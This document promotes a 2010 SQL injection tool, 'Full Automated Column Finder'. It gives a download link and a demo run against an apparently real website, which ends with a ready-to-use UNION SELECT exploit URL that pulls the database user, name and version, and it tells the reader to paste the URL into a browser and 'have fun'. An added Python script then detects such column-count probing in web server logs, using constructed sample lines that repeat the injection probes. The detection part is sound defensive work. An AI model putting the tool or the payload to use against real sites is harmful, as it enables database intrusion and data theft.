[*] Description
The Full Automated Column Finder helps you determine the correct number of columns in the current SQL query. It is useful for SQL injection and saves you some time fuzzing manually. After the correct number of columns has been found, a sample URL for exploiting the SQL injection vulnerability can be displayed.

[*] Download
http://xenuser.org/tools/column_finder.py

[*] Author webpage
Ascii for Breakfast

[*] Source
Full Automated Column Finder for SQL Injection

[*] Demo
hp work # python column_finder.py -u "http://www.mida.ro/content.php?id=21"

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Full Automated Column Finder for SQL Injection
by Valentin Hoebel (valentin@xenuser.org)
Version: 1.1 (23th May 2010)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

>> Checking if connection can be established...
>> Connected to target! URL seems to be valid.
>> Trying to find the correct number of columns...
>> Correct number of columns found!
>> Amount: 4
>> Do you want to have a sample URL for exploiting? (Yes/No) Yes

http://www.mida.ro/content.php?id=21+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--

Simply copy and paste this link into your browser
Have fun! Bye
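
Seen from the server side, a column search like the one in the demo shows up in access logs as one client sending UNION SELECT requests of different select-list widths to the same path. The script below is an added detection example, not part of the tool or of the original post; the log format and sample lines are constructed, and the assumption that the probes differ in column count from request to request is mine, not taken from the tool's source.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines ("client request-target"); documentation IPs, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 /content.php?id=21+AND+1=2+UNION+SELECT+1--
198.51.100.7 /content.php?id=21+AND+1=2+UNION+SELECT+1,2--
198.51.100.7 /content.php?id=21+AND+1=2+UNION+SELECT+1,2,3--
198.51.100.7 /content.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4--
203.0.113.9 /search.php?q=student+union+select+committee
203.0.113.9 /content.php?id=21
"""

UNION_RE = re.compile(r"union(?:\s+all)?\s+select\s+(.*)", re.I | re.S)

def select_width(target):
    """Number of top-level select-list items after UNION SELECT, or 0 if absent."""
    query = unquote_plus(target.partition("?")[2])  # decodes '+' and %XX
    m = UNION_RE.search(query)
    if not m:
        return 0
    items, depth = 1, 0
    for ch in m.group(1).split("--")[0]:  # ignore the trailing SQL comment
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(depth - 1, 0)
        elif ch == "," and depth == 0:  # commas inside concat(...) do not count
            items += 1
    return items

def probing_clients(log_text, min_widths=3):
    """Return {(client, path): widths} where one client tried >= min_widths widths."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        client, _, target = line.strip().partition(" ")
        width = select_width(target)
        if width:
            seen[(client, target.partition("?")[0])].add(width)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_widths}

if __name__ == "__main__":
    for (client, path), widths in probing_clients(SAMPLE_LOG).items():
        print(f"{client} probed {path} with UNION SELECT widths {widths}")
```

Requiring several distinct widths from one client keeps a lone search phrase that happens to contain "union select" from raising an alert; a real deployment would also need to decode whatever encodings its own log format applies.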